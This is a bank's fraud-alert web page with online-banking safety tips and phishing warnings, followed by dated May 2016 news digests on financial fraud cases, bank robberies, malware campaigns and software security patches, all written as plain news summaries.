Fraud Alert Message Center

Tips for Safe Banking Over the Internet

As use of the Internet continues to expand, more banks are using the Web to offer products and services or otherwise enhance communications with customers.

The internet offers the potential for safe, convenient new ways shop for financial services and conduct banking business, any day, any time. However, safe banking online involves making good choices - decisions that will help you avoid costly surprises or even scams.

Current Online Threats

Please be aware of any email you receive from the following organizations FDIC, FFIEC, NACHA, EPCOR, Federal Reserve and the Better Business Bureau.  None of these organizations should ever send you unsolicited emails regarding your bank or your bank accounts.  If you receive an email purporting to be from any of the above organizations or other emails you are unsure about, do not open it.  The email could potentially contain a virus or malware.

For more information regarding email and phishing scams, please visit: http://onguardonline.gov/

Online Shopping Tips for Consumers. Click Here for Information.

ATM and Gas pump skimming information. Click Here for Article.

5/26/16

Elderly ex-con arrested for alleged $5M fraud scheme. Texas officials announced May 24 that a former executive at AG Cooper & Associates was arrested and indicted the week of May 16 on charges alleging that the executive orchestrated a wire and mail fraud scheme that bilked over 50 investors out of $5 million by issuing false quarterly statements to investors that indicated their funds were earning over 11 percent in legitimate investments. Officials stated that the executive used the funds for personal use.

The Treasury Department says it has arrested five people in Miami accused of defrauding victims of nearly $2 million by posing as IRS agents and demanding payment of overdue taxes. Officials from the U.S. Treasury Inspector General for Tax Administration office announced May 24 that 5 Cuban nationals were arrested in Miami for their roles in an estimated $2 million fraud scheme where the group posed as U.S. Internal Revenue Service (IRS) agents in telephone calls and threatened to arrest victims if they did not make an immediate payment of overdue taxes or other fees. Authorities stated that the victims were required to wire transfer the money, which is a method not used by the IRS.

Fiverr removes DDoS-for-Hire services from its marketplace. Fiverr banned and removed a series of ads reportedly providing distributed denial-of-service (DDoS)-related offerings on its marketplace Web site after security researchers from Incapsula found several DDoS services.

Hackers take over thousands of Twitter accounts and tweet out adult content. Symantec discovered that over 2,500 Twitter accounts were compromised after hackers took over Twitter profiles, changed a user’s avatar picture, and sent out links to adult Web sites or Web cam sites by using Uniform Resource Identifier (URL) shorteners, primarily Bit.ly, to hide a link to adult Web sites using referral tags.

Unpatched flaws plague Moxa connectivity products. The Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) and an independent security researcher discovered that Moxa’s MiiNePort E1, E2, and E3 device models were plagued with at least three serious vulnerabilities including a weak credentials management issue, a clear text password issue, and a cross-site request forgery (CSRF) flaw. The devices are used in the commercial facilities sector, critical manufacturing sector, the energy sector, and the transportation sector.

After record high numbers, a lot of people still don’t know what ransomware is. Kaspersky released a report after studying over 5,000 users in the U.S. and Canada which revealed that 43 percent of users studied were unfamiliar with ransomware and were unaware that they could lose critical data after such infections. The lack of knowledge reveals why users are unaware of how to deal with ransomware infections. 

5/24/16

Columbia man guilty of federal bank, loan fraud. A former employee at Scott Credit Union in Illinois pleaded guilty May 19 to Federal charges after he defrauded the bank out of $12 million by embezzling credit union funds, creating fraudulent loans, paying loans through the misapplications of funds from other loans, and increasing credit limits on loans that did not have board approval, among other fraudulent actions from November 2005 – December 2014. Officials stated the man also knowingly submitted a fraudulent report to the bank for the third quarter of 2014 that misstated loan balances, omitted loan amounts, and severely underreported loans.

Exploit for recently patched flash flaw added to Magnitude EK. A French security researcher discovered that attackers were integrating the Magnitude exploit flaw against previously patched Flash Player 21.0.0.213 installations to potentially deliver various pieces of malware, including Locky and Cerber ransomware. The exploit was not fully implemented in Magnitude and researchers advised users to be cautious of the exploit.

Ransomware adds DDoS capabilities to annoy other people, not just you. Security researchers from Invincea reported that the Cerber ransomware was discovered to have a new payload capability to launch network packets to a network subnet, which is a specific capability to distributed denial-of-service (DDoS) botnets. The ransomware was detected by 37 out of the 57 antivirus engines and spreads via weaponized rich text format (RTF) files.

Crooks used SQL injections to hack Drupal sites and install fake ransomware. Chief executive officer (CEO) and co-founder of Forkbombus Labs reported that attackers were leveraging a structured query language (SQL) injection vulnerability in Drupal 7.x installations prior to version 7.32 content management system (CMS) platform to compromise Web sites and install Web-based ransomware by scanning the Drupal site version and leveraging the flaw to break into the affected Web sites and change the admin user’s password.

5/23/16 

SEC announces insider trading charges in case involving sports gambler and board member. The U.S. Securities and Exchange Commission announced insider trading charges May 19 against a professional sports gambler and a former board member at Dean Foods Company after the board member allegedly provided the gambler with advance information about Dean Foods including market-moving events, and company earnings statements from 2008 – 2012, among other information regarding Darden Restaurants stocks, which the gambler used to make $40 million in illegal profits. Officials stated the duo used prepaid cell phones and other methods to conceal the illicit activity, and convinced a professional athlete to trade the food company’s securities to pay off a gambling debt. 

60 percent of Androids exposed by new attack on mediaserver. A security researcher from Duo reported that about 60 percent of enterprise Android phones running Lollipop version 5 operating system (OS), KitKat version 4.4, and Marshmallow version 6 OS were susceptible to a Qualcomm Secure Execution Environment (QSEE) vulnerability after researchers discovered the flaw in the mediaserver component that could allow an attacker to gain complete control over the device by tricking users into installing a malicious app. 

Researcher wins $5,000 for finding two ways to brute-force Instagram accounts. Facebook fixed two security flaws on its social network, Instagram that could have allowed an attacker to execute brute-force attacks and gain control over users’ accounts due to Instagram’s weak password policy, its usage of incremental user identifications, and lack of proper rate limiting protection. 

Vulnerabilities found in Siemens SIPROTEC protection relays. Security researchers from Siemens and the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) discovered SIPROTEC 4 and SIPROTEC Compact devices were plagued with several information disclosure vulnerabilities that can allow attackers to obtain sensitive device information if hackers gain access to the network hosting the devices. Siemen released updates for its firmware version 4.27, but has yet to release updates for other relays.

5/20/16 

‘Hipster Bandit’ robs bank minutes after failed attempt. Authorities are searching for a man dubbed the “Hipster Bandit” who is suspected of robbing a Union Bank branch and attempting to rob a Wells Fargo Bank branch in Oceanside, California, May 18. The man is suspected of robbing at least four other banks in San Diego County since July 2015. 

Naples men pleads guilty to defrauding insurance companies. A Naples man pleaded guilty May 18 to Federal charges after the man and co-conspirators ran five unlicensed chiropractic clinics that received over $2 million in fraudulent insurance payments from car insurance companies by soliciting people to participate in staged vehicle accidents in exchange for compensation, and coaching the patients involved in the scheme to receive unneeded treatment. Officials stated the group used a shell corporation to conceal the proceeds from the fraudulent insurance claims and four other people were charged for their roles in the scheme. 

ATMs targeted with improved “Skimer” malware. Researchers at Kaspersky Lab discovered a new version of an ATM malware dubbed, “Skimer” that allows attackers direct interaction with ATMs by inserting two types of cards with specially crafted Track 2 data into the infected machine; one designed to execute commands hardcoded in Track 2, while the other allows attackers to launch 1 of 21 predefined commands using the personal identification number (PIN) and malware interface to dispense money from the machine, collect the details of cards inserted, and print the information collected from cards. Researchers stated attackers can use the malware interface to delete the malware, debug it, and update it with code stored on the special card. 

A quarter of all hacked WordPress sites can be attributed to three plugins. Sucuri conducted an investigation on over 11,485 compromised Web sites and released its “Website Hacked Report” which revealed that during the first 3 months of 2016, 78 percent of hacked Web sites were using the WordPress Content Management System (CMS) platform and found that attackers were primarily using outdated plugins to hack WordPress sites. Outdated plugins included RevSlider, GravityForms, and TimThumb, but officials concluded that only 56 percent of all WordPress sites were running outdated WordPress core versions. 

TeslaCrypt ransomware project appears to shut down, offers free decryption key. Security researchers from ESET found that the TeslaCrypt ransomware operation will be shut down and the operators of the ransomware agreed to offer a master decryption key for all victims infected with the TeslaCrupt v3 and v4 after a researcher contacted the ransomware operator using the ransom Web site hosted on the Dark Web via their support channel. 

Cyber attackers target US presidential campaigns: Official. The DHS and the FBI are investigating cyberattacks against the campaigns of the U.S. presidential candidates after the director of the U.S. National Intelligence Council reported there were indications that revealed cyber attackers were targeting both the Democratic and Republican representatives. Officials stated the attacks could range from defacement to intrusion. 

Macro malware makes improvements on hiding malicious code. Security researchers from Microsoft’s Malware Protection Center discovered a new variation of the Donoff macro malware had evolved to avoid detection after finding that the malware was disseminated via spam email campaigns with attachments made to look non-malicious. The attachments contain seven Visual Basic for Applications (VBA) modules with an encrypted string in the Caption field for CommandButton3 and an unusual code in Module2. 

117M LinkedIn passwords leaked. LinkedIn officials reported May 18 that an additional 117 million LinkedIn users’ emails and passwords were compromised as attackers were discovered selling the information on the Dark Web May 16 following a 2012 breach where a hacker named “Peace” gained unauthorized access and compromised more than 6 million users’ accounts. The social network reported that the additional compromised accounts were not a result of a new security breach and were working to apply a password reset to potentially compromised accounts.

5/19/16 

Fraud alert: Card skimmers discovered at 4 Greenville First Citizens Bank ATM locations. Authorities are searching May 17 for the persons responsible for installing card skimmers at four different First Citizen Bank ATM locations in Greenville, North Carolina, after a bank employee discovered one of the malicious card readers during an ATM inspection. Police and First Citizen Bank staff were monitoring account activity for suspicious transactions. 

Guilty plea in multi-million-dollar Ponzi scheme. A Minnesota resident pleaded guilty May 17 to running a $250 million Ponzi scheme where the man used his business, Minnesota Print Services Inc., to defraud investors by claiming he had printing contracts with major corporations and needed cash upfront to receive discounts on purchasing paper, causing investors in 7 States up to $54 million in losses. Officials stated the man used the investors’ funds for personal expenses. 

‘BDL’ bandit robs Warrensville Heights bank. FBI authorities are searching for a man dubbed the “BDL Bandit” who is suspected of robbing five banks including the First Merit Bank in Warrensville Heights, Ohio, May 17. Authorities stated the suspect is considered armed and dangerous. 

Minnesota woman pleads guilty to faking husband’s death for insurance money. A Minnesota woman pleaded guilty May 16 to defrauding Mutual of Omaha Insurance Company out of more than $2 million in life insurance proceeds by falsely claiming her ex-husband’s death after she identified the remains of a body in Moldova as her former husband. Officials stated the woman recruited a third party to open a U.S. bank account and transfered $1.5 million of the insurance proceeds to her son’s account, which was then transferred to bank accounts in Switzerland and Moldova from March 2012 – January 2015. 

Cisco patch blocks DoS vulnerability. Cisco released patches for its Adaptive Security Appliance (ASA) software after security researchers found attackers could alter a memory block, allowing the system to cease transferring traffic and cause a denial-of-service (DoS) situation. The flaw was reportedly linked to an issue in the installation of Internet Control Message Protocol (ICMP) error handling for Internet Protocol Security (IPSec) packets. 

Windows malware tries to avoid 400 security products. A senior security researcher at enSilo reported that the malware, Furtim was seen avoiding security detection as the malware has the ability to search the infected machine for registry entries or service executable names of 400 security products, including rare security products, virtualization environments, and sandboxing products. Once the malware detects a security product, the malware terminates itself and leaves the computer unharmed, avoiding any type of detection. 

Researcher wins $5,000 for finding XSS bug on Google in most peculiar manner. A security researcher from ERNW found a “sleeping stored” cross-site scripting (XSS) vulnerability in Google’s Cloud Console product which could allow an attacker to create a project with a payload in its name and leave it on the dashboard, tricking an administrator into deleting the unknown project and triggering the exploit. Google was made aware of the exploit.

5/18/16 

Ukrainian hacker admits stealing business press releases for $30M gain. A Ukrainian citizen pleaded guilty May 16 to Federal charges for his role in a $30 million hacking scheme where the man and 9 co-conspirators hacked into PR Newswire, Business Wire, and Marketwired to get advance notice on over 150,000 company’s earnings statements, and sold the insider trading information for tens of thousands of dollars to traders who executed deals to buy or sell stocks based on the stolen information, which had not yet been released from 2010 – 2015. Officials stated that once the transactions were complete, the traders shared the illegal profits with the hackers through foreign shell companies. 

Possible security breach at local bank has customers concerned. Southern Michigan Bank and Trust alerted its customers May 6 to a possible security breach targeting the bank chain after a company laptop containing sensitive information including customers’ names, addresses, and account numbers, among other data, was stolen from a vehicle owned by the company’s operations manager in April. Bank officials stated the laptop is password protected and there have been no indications of an active breach of sensitive information. 

Critical vulnerability in Symantec AV Engine exploited by just sending an email. Symantec updated its Antivirus Engine (AVE) addressing a critical memory corruption flaw after a security researcher from Google Project Zero discovered the flaw affected most Symantec and Norton-branded antivirus products and reported the issue related to how the antivirus products handle executables compressed in the ASPack file compressor. The vulnerability can be remotely exploited for code execution by sending a specially crafted file to the victim. 

Apple patches flaws in iOS, OS X, other products. Apple released version 9.3.2 for its mobile operating systems (iOS) including its OS X, iOS, iTunes, Safari, tvOS, and watchOS products which patched 39 flaws after security researchers from Google, Trend Micro, and Context Information Security, among other security companies, found a way to bypass the lockscreen on the iPhone 6s and access photos and contacts by using Siri to conduct an online search for email addresses via Twitter. 

Million-Machine botnet manipulates search results for popular search engines. Security researchers from Bitdefender reported that a click-fraud botnet, Million-Machine can modify Internet Explorer proxy settings and add a Proxy Auto Configuration (PAC) script to hijack all Web traffic through a local proxy server and view all Web traffic originating from the personal computer (PC) via infected downloadable versions of popular software programs including WinRAR, YouTube Downloader, and Connectify, among other products. The malware’s dissemination was assisted by the Redirector.Paco botnet that modifies a computer’s local registry keys with two entries disguised as Adobe products to make the Million-Machine malware begin its operations after each PC restart. 

Chrome to deprecate Flash in favor of HTML5. The technical program manager at Google (Chrome) reported that they will only allow Flash Player execution if a user has indicated that the domain should execute the program and will begin to implement an “HTML5 by Default” policy on its Chrome Web browser by Quarter 4 (Q4) 2016. Chrome will introduce the new feature with a temporary whitelist of the current top Flash Player Web sites, which will expire after one year. 

Attackers deliver latest Flash exploit via malicious documents. Security researchers from FireEye reported that a type confusion flaw, previously patched by Adobe, was revealed to have disseminated the exploit via Uniform Resource Identifier (URL) or email attachment after attackers embedded the Flash Player exploit inside Microsoft Office documents, which attackers hosted onto their Web server, and used a Dynamic DNS (DDNS) domain to reference the document and payload.

5/17/16 

Upgraded Android banking trojan targets users in 200 countries. Security researches from Doctor Web reported that an Android banking trojan dubbed Android.SmsSpy.88. origin, initially discovered in 2014, was updated with new ransomware capabilities including a credit card information stealing capability that targets around 100 banking applications by using WebView to display a phishing window on top of the legitimate banking app, and by utilizing a fake Google Play payment phishing page to intercept and send short message service (SMS) and multimedia messaging service (MMS) messages, send unstructured supplementary service data (USSD) requests, and transmit all saved messages to the server, among other malicious actions. Security researchers stated the trojan has infected over 40,000 devices in over 200 countries. 

M&T Bank settles Federal fraud case for $64 million. M&T Bank Corporation agreed May 13 to pay the Federal government $64 million to settle charges after a former underwriter at M&T filed a whistleblower lawsuit against the bank in 2013 alleging she witnessed fraud in the bank’s Federal Housing Administration underwriting practices, prompting a Federal investigation which revealed that the bank awarded housing loans that did not meet Federal requirements. 

SEC charges two attorneys with defrauding escrow clients. The U.S. Securities and Exchange Commission announced May 13 fraud charges against two attorneys acting as escrow agents after the duo allegedly made undisclosed risky investments and stole $13.8 million they obtained in escrow amounts from small business owners by making misrepresentations to clients about a purported loan company, Atlantic Rim Funding, siphoning clients’ investment funds to pay themselves and others, and gambling on risky securities derivatives. Officials stated the pair concealed their illicit actions by claiming the money used for the securities trades was their own and did not belong to clients. 

Data leaked from hacker forum Nulled.io. Risk Based Security reported that the popular forum, Nulled.io was compromised after hackers leaked a 1.3Gb archive containing more than 536,000 user account information including usernames, email addresses, hashed passwords, application program interface (API) credentials for payment gateways, authentication logs, and Internet Protocol (IP) addresses, among other data. Researchers are unsure how the Nulled.io database was compromised and the forum was taken offline due to the attack. 

New Simple attack on Squid proxies leverages malicious flash ads. Squid released versions 4.0.10 and 3.5.18 addressing a vulnerability in its products after a graduate from Tsinghua University discovered a vulnerability dubbed Squison in Squid 3.5.12 to 3.5.17 and all 4.x versions up to 4.0.9 that could allow hackers to poison a Squid proxy server’s cache with malicious content by using simple attacks including a malicious Flash ad or through a Web site controlled by an attacker. 

Researchers crack new version of CryptXXX ransomware. Researchers from Kaspersky Lab created a new tool titled, RannohDecryptor that will help victims decrypt files and recover lost information affected by the CryptXXX 2.0 malware. Researchers advised users to install software program updates to mitigate ransomware attacks. 

Silk Road 3.0 pops up on the Dark Web, once again. A Reddit online thread reported that a new Silk Road marketplace dubbed, Silk Road 3.0, was active after its predecessor site was shut down following an FBI raid that arrested the Web site’s users, moderators, and administer. The marketplace was seen actively compiling stolen data, exploits, botnets, drugs, and weapons, among other illegal items, for attackers to purchase. 

Five-year-old SAP vulnerability affects over 500 companies, not 36. The U.S. Computer Emergency Response Team (US-CERT) issued a public alert to all U.S. companies after ERPScan discovered at least 533 companies were affected by an SAP vulnerability largely due to the companies’ failure in installing a SAP security patch issued in 2010. The vulnerability can allow attackers to gain complete control of SAP business platforms via a bug in Invoker Servlet, a component in SAP’s Java platforms. 

Meteocontrol patches flaws in Photovoltaic Data logger. Meteocontrol released an update for all versions of its WEB’log Basic 100, Light, Pro, and Pro unlimited products used in the energy, water, critical manufacturing, and commercial facilities sectors after a security researcher discovered that the products were plagued by critical authentication flaws, information exposure flaws, and a cross-site request forgery (CSRF) flaw that could allow attackers to perform actions on behalf of the user without authentication and access an administrator password in clear text.

5/16/16

SWIFT warns of malware attack on another customer. The Society for Worldwide Interbank Financial Telecommunication (SWIFT) warned customers May 13 against a second malware attack discovered at a bank using its services that targeted customer banks’ secondary security controls by modifying the bank’s PDF reader with malicious software to conceal the fraudulent transactions in PDF reports of payment confirmations. Attackers also exploited vulnerabilities in the bank’s systems in order to initiate fund transfers, steal credentials, and use them to send irrevocable fund transfer orders via the SWIFT network.

RushCard to pay $19 million to users for last year’s outage. RushCard agreed to pay at least $19 million to compensate its users impacted by an October 2015 service outage after the company attempted to switch payment processors, which caused tens of thousands of RushCard accounts to freeze leaving customers without access to their money for as long as 2 weeks. According to the agreement, the company will pay each customer who could not access their funds at least $100, and up to $500 to individuals who can document any losses incurred due to the outage.

Former worker pleads guilty in $626,941 banks embezzlement case. The former president of People’s Savings Bank in Crawfordsville, Iowa, pleaded guilty May 9 to embezzling $626,941 from the bank after he created multiple straw loans involving existing bank customers and stole the loan proceeds from December 2002 – March 2013. Officials stated the former executive also received unauthorized bonuses and salary increases from January 2008 – October 2013.

Adobe patches Flash zero-day exploited in the wild. Adobe updated its Flash Player for Microsoft Windows, Apple Mac, and Linux addressing 25 vulnerabilities including a type confusion, use-after-free, buffer overflow, directory search path, various memory corruption vulnerabilities that can lead to arbitrary code execution, and a zero-day that has been exploited in the wild.

7-Zip 16.0 released to fix gaping security hole. The 7-Zip project released version 16.0 of their open-source (de)compression software patching two critical vulnerabilities discovered by Cisco’s Talos team, which include a heap overflow vulnerability and an out-of-bounds read vulnerability, due to an issue with how the 7-Zip client handles Universal Disk Format (UDF) files. Attackers can create a booby-trapped 7-Zip archive which contains a malicious file that clients’ can unzip, initiating the attack.

5/13/16

FBI: Serial ‘Ballcap Bandit’ bank robbery suspect strikes again. Authorities are searching May 11 for a man dubbed the “Ballcap Bandit” who is suspected of robbing a Wells Fargo Bank branch in Falls Church, a Wells Fargo Bank branch in Alexandria, and a SunTrust Bank branch in Del Ray, Virginia, since April. Authorities were unsure if the suspect is armed.

Former Savannah CEO pleads guilty to $9M bank fraud. The former chief executive officer (CEO) and president of Central Bank in Savannah, Tennessee, pleaded guilty May 11 to Federal fraud charges after he made unauthorized advances to Tennessee Materials Corp., (TMC) and allowed TMC to deposit 161 insufficiently funded checks to cover overdraft balances in the company’s account from 2009 – 2012, causing Central Bank, Wayne County Bank, and First Metro Bank more than $9 million in losses. Officials stated the bad checks created false balances in TMC’s account, enabling the company to use approximately $3.9 million that belonged to Central Bank without the bank’s knowledge or approval.

Region 8 women plead guilty to bank fraud of nearly $4 million. Officials from the U.S. Attorney’s Office for the Eastern District of Arkansas and the FBI announced May 11 that three employees at the First National Bank of Lawrence County pleaded guilty to embezzling more than $3.9 million from the bank from 2005 – 2015. Officials stated that the trio received advanced notice of internal audits, and would temporarily transfer money from other branches of the bank into the main vault to conceal their theft from auditors.

Google patches more high risk vulnerabilities in Chrome 50. Google released a round of security patches for Chrome 50 addressing five vulnerabilities, three of which were deemed high severity, and include a same origin bypass issue in the Document Object Model (DOM), a same bypass bug in Blink V8 bindings, and a buffer overflow flaw in V8. A directory traversal flaw using the file scheme on Android, and a race condition bug in loader were also patched, among other vulnerabilities.

SAP patches critical vulnerabilities in Enterprise products. SAP released 10 Security Patch Day Notes and 11 Support Package Notes fixing 10 vulnerabilities , mainly in its NetWevwer Advanced Business Application Programming (ABAP) platform and Java, including critical flaws in Adaptive Server Enterprise (ASE) XPServer, Crystal Reports for Enterprise, and Predictive Analytics which could allow an attacker to potentially execute commands remotely without authorization, obtain critical technical and business-related information, or gain unauthorized access and perform actions in the system.

5/12/16 

Guilty plea in $250M pump-and-dump scheme. The owner of a broker-dealer and investment management firm based in Panama and Belize pleaded guilty May 9 to running a $250 million pump-and-dump scheme where he and co-conspirators convinced U.S. investors to buy stock in over 40 thinly-traded public companies by falsely touting and inflating the share values, and established shell companies to circumvent U.S. Internal Revenue Service (IRS) tax reporting requirements from 2010 – 2014. Officials stated that the broker and his co-conspirators dumped their shares at inflated rates and used corrupt law firms to launder the fraudulent proceeds. 

Prominent Manhattan landlord arrested. A Manhattan landlord was arrested and charged May 9 after he allegedly secured more than $45 million in fraudulent mortgage loans by inflating rental and other income from his Manhattan residential buildings, and submitting fraudulent mortgage documents to banks. The New York State Attorney General’s office also filed parallel civil charges against the landlord after he and his staff drove tenants from their rent-regulated apartments by creating dangerous and unlivable conditions, filing frivolous lawsuits, and offering buyouts. 

Wi-Fi flaw exposes Android devices to attacks. Google and the developers of Wi-Fi Protected Access (WPA) supplicant patched a high severity privilege escalation flaw that is used in the Android operating system (OS) and several other products after SEARCH-LAB researchers determined that the vulnerability can be exploited to write arbitrary values in the wpa_supplicant configuration file, allowing an attacker to execute arbitrary code with elevated privileges or disrupt the device’s Wi-Fi functionality. The weakness is exploited through a Wi-Fi Protected Setup (WPS) attack or the wpa_supplicant control interface. 

Microsoft patches flaws exploited in targeted attacks. Microsoft released 16 security bulletins patching over 30 flaws exploited via Internet Explorer, Windows, and Office which address JavaScript and Visual Basic Scripting Edition (VBScript) zero-days, several remote code execution (RCE) vulnerabilities in Edge running on Windows 10, and a Transport Layer Security (TLS) vulnerability, among others. 

Syrian Electronic Army hacker extradited to U.S. A suspected member of the Syrian Electronic Army hacktivist group was extradited from Germany to the U.S. to face charges that he and two other alleged members took part in a criminal conspiracy related to their campaign which involved targeting and hacking into the systems of government organizations, media companies, and other private-sector entities. 

DHS moves to bolster intrusion/detection for Federal networks. DHS released its Privacy Impact Assessment and announced the addition of a new intrusion prevention security service to its National Cybersecurity Protection System (NCPS) dubbed Einstein 3A which is a Web Content Filtering system that provides protection at the application layer for Web traffic by blocking access to suspicious sites, and works to prevent, detect, and block malware from running on systems and networks. 

Adobe warns of Flash zero day, patches Acrobat, Reader. Adobe issued 95 fixes for Acrobat, Reader, and ColdFusion addressing use-after-free vulnerabilities, memory corruption flaws that could lead to code execution, heap buffer overflow vulnerabilities, and several other flaws that could result in information disclosure or memory leak. A patch for a zero day vulnerability in Flash Player which could cause a crash and allow an attacker to take control of the system is expected to be released the week of May 9.

5/11/16 

Four charged in alleged central Kentucky bank fraud involving $40 million. A loan officer and three others were indicted on Federal charges May 9 after the group, operating as various businesses, allegedly defrauded several central Kentucky banks out of more than $40 million in loans or loan renewals by making false representations or omissions on loan documents to banks in Fayette, Woodford, and Harrison counties from May 2006 – September 2010. Officials stated that the group used the loans for purposes other than those listed in the application. 

Android trojan steals credit card info, locks devices remotely. Researchers from Avast discovered a new Android banking trojan that is capable of spying on users and stealing credit card information by gaining admin rights to a victim’s device after continuously prompting the Device Admin activation dialog until the user grants the malware admin rights, while hiding the app icon following the program’s first run. Researchers stated that the trojan is designed to send information about the device to a command and control (C&C) server, intercept incoming short message service (SMS) messages and send them to the server, and receive further commands from its operators. 

SS7 attack leaves WhatsApp and Telegram encryption useless. Positive Technologies researchers unveiled a new attack that utilizes Signaling System No. 7 (SS7) to carry out attacks on encrypted communications apps such as WhatsApp and Telegram by spoofing a mobile network node and intercepting the initial phase of a chat between two users. The researchers were able to impersonate a second user through SS7 loopholes that were never patched. 

CryptXXX is now undecryptable, prevents users from accessing their PC. Researchers at Proofpoint discovered CryptXXX version 2.006, an update to CryptXXX, which defeats a Kaspersky Lab decrypter, blocks users’ from going online, and locks a user’s entire screen, forcing them to log onto a different computer to go online to buy Bitcoin and pay the ransom. The ransomware is distributed via malvertising campaigns, malicious ads on legitimate Web sites, or through an intermediary malware called Bedep.

5/10/16 

Israel approves extradition to U.S. of two securities fraud suspects. Officials from Israel’s Ministry of Justice approved May 8 the extradition of two men to the U.S. indicted in the U.S. District Court for the Southern District of New York for their roles in a “pump-and-dump” stock manipulation scheme where the men and co-conspirators acquired shares in thinly traded companies, sent millions of spam emails inducing investors to purchase the stocks in order to artificially inflate the price, then sold off their holdings from 2011 – 2015. Authorities stated that charges were added to the indictment in March after discovering that the duo hacked into a dozen companies’ networks and stole the personal information of more than 100 million people. 

Over two dozen flaws found in Aruba products. Aruba Networks patched some of the 26 security flaws discovered by a Google security engineer, and is working to patch the remaining vulnerabilities which impact all versions of ArubaOS, AirWave Management Platform 8.x versions prior to 8.2, and Aruba Instant access points (IAP) prior to 4.1.3.0 and 4.2.3.1. Some of the vulnerabilities discovered include the transmission of login credentials via Hypertext Transfer Protocol (HTTP), default accounts, remote code execution flaws, firmware-related weaknesses, information disclosure issues, and Protocol Application Programming Interface (PAPI)-related security bugs. 

Google suffers minor data breach via third-party benefits vendor. Google notified an unknown number of employees following a data breach that occurred when a manager of a third-party benefits vendor sent a file containing the names and Social Security numbers of an undisclosed number of Google employees to the wrong person. The individual who received the data deleted it from his computer and notified Google’s vendor of the incident. 

Bucbi ransomware makes a comeback after two years. Researchers at Palo Alto Networks reported that a cyber-crime group is utilizing a re-tooled version of the Bucbi ransomware that does not rely on social engineering tactics and works without needing to connect to an online command and control (C&C) server, uses a different installation routine, and also employs a different ransom note. The group uses brute-force attacks against corporate networks running Internet-available Remote Desktop Protocol (RDP) servers. 

190 Android apps infected with malware discovered on the Google Play Store. Google removed 190 applications infected with malware from its Google Play Store after it was notified by Dr. Web security researchers who discovered that the malware’s mode of operation, Android.Click, waits for 6 hours after it is installed before forcibly loading a Uniform Resource Locator (URL) in the user’s browser, prompting the user back to the Google Play Store to download a second app. 

WordPress 4.5.2 released to fix XSS and SOME security bugs. The WordPress project released version 4.5.2 of its open-source platform addressing two security issues in two libraries packed with the content management system (CMS) after Cure53 researchers found a Same-Origin Method Execution (SOME) vulnerability in the Plupload library, which allows attackers to perform unintended actions on a Web site on behalf of victims, and a cross-site scripting (XSS) issue in the MediaElement.js library.

5/9/16 

New trojan targets banks in US, Mexico. Researchers from Zscaler discovered that a new information stealer trojan which leverages legitimate tools to target online banking users in the U.S. and Mexico is delivered via the “curp.pdf.exe” installer served on several compromised Web sites which downloads a main payload file, a Fiddler dynamic link library (DLL) file, and a Json.Net DLL file on a victim’s device to collect system information and send it back to the command and control (C&C) server, to parse the server’s response and save the information in an extensible markup language (XML) file, and to intercept Hypertext Transfer Protocol (HTTP) and Secure Hypertext Transfer Protocol (HTTPS) connections and redirect users to a malicious Web site masked as a bank’s legitimate domain. 

Pair arrested in counterfeit credit card scheme: MDPD. Two men were arrested and charged May 5 after detectives witnessed the duo using counterfeit credit cards to make fraudulent purchases at the Dadeland Mall and stores throughout Miami-Dade County. Authorities stated a subsequent search of one of the suspects’ vehicles revealed 192 counterfeit credit cards. 

Chicago financial adviser pleads guilty to $4.2M fraud. The operator of a Chicago-based investment firm, D.J. Mosier and Associates pleaded guilty May 5 to defrauding 9 clients out of more than $4.2 million by persuading them to invest in phony “Chicago Anticipatory Notes” debt securities. The financial adviser cashed the investors’ checks into her personal bank account and used the money for personal expenses, and to make bogus interest payments to previous clients. 

Android trojan pesters victims, won’t take no for an answer. Avast researchers determined that an information-stealing Android trojan that is inadvertently downloaded by users, begins its infection after an icon is installed in the launcher in the name of a fake app which launches a dialog box that asks the user to grant it admin rights and blocks further access. Users can remove the trojan by powering down the phone and restoring it to factory settings or uninstalling the app. 

New security flaw found in Lenovo Solution Center software. Trustwave SpiderLabs reported a new vulnerability in Lenovo’s Solution Center software which is tied to the software’s backend and can allow an attacker with local network access to a PC to execute arbitrary code and elevate privileges. The company updated a previous security advisory disclosing the additional vulnerability and released a fix addressing the vulnerability. 

Ransomware infections grew 14 percent in early 2016, April the worst month. Kaspersky, Enigma Software Group, and the FBI issued a warning to companies about the increase in ransomware infections following reports of at least 2,900 new ransomware variants, representing a 14 percent increase in Quarter 1 of 2016. Researchers also found a significant increase in the number of attacks during April. 

New Attack on WordPress sites redirects traffic to malicious URLs. Security researchers from Sucuri reported that hackers were continuously leveraging vulnerabilities in older WordPress versions or WordPress plugins by altering the Web sites’ main theme’s header.php file via 12 lines of obfuscated code to redirect users to malicious Web sites. In addition, Joomla Web sites were seen with a similar malicious code in the administrator/includes/help.php file. 

Qualcomm software flaw exposes Android user data. Security researchers from FireEye discovered Qualcomm Technologies, Inc., open source software package and devices running Android 5.0 Lollipop and earlier versions were plagued with an information disclosure vulnerability that could allow a malicious application to access user information as long as the application has the “ACCESS_NETWORK_STATE” permission. Qualcomm issued security updates patching the vulnerability. 

Adobe issues pre-patch advisory for Reader, Acrobat. Adobe issued a pre-patch advisory stating that it will release patches for its PDF Reader and Acrobat software products May 10, which will address critical vulnerabilities

5/6/16 

Cisco patches serious flaws in FirePOWER , TelePresence. Cisco released software updates patching several vulnerabilities in its FirePOWER and TelePresence products including a critical vulnerability that allows a remote, unauthenticated attacker to bypass authentication and gain access to a targeted system, as well as several high severity denial-of-service (DoS) vulnerabilities that could allow a remote attacker to cause a system to stop inspecting and processing packets by sending a specially crafted packet. The company stated there was no evidence to suggest the exploits were used for malicious purposes. 

Apple updates Xcode to patch Git vulnerabilities. Apple released Git version 2.7.4 and Xcode version 7.3.1, patching several remote code execution (RCE) vulnerabilities affecting Git versions 2.7.3 and earlier versions, after discovering attackers could exploit the flaws to push or clone a repository with a large file name or a large number of nested trees in Apple’s operating system (OS) X El Capitan. 

Exclusive: Big data breaches found at major email services – expert. The founder and chief information security officer of Hold Security reported that 273.3 million stolen accounts including users of Mail.ru, Google accounts, Yahoo accounts, and Microsoft accounts were being traded in Russia’s criminal underworld after the security firm discovered a Russian hacker, dubbed, “The Collector” was seen bragging in an online forum pertaining to the number of stolen credentials he collected and was prepared to sell. Many of the stolen username and passwords allegedly belong to employees in U.S. banking, manufacturing, and retail companies. 

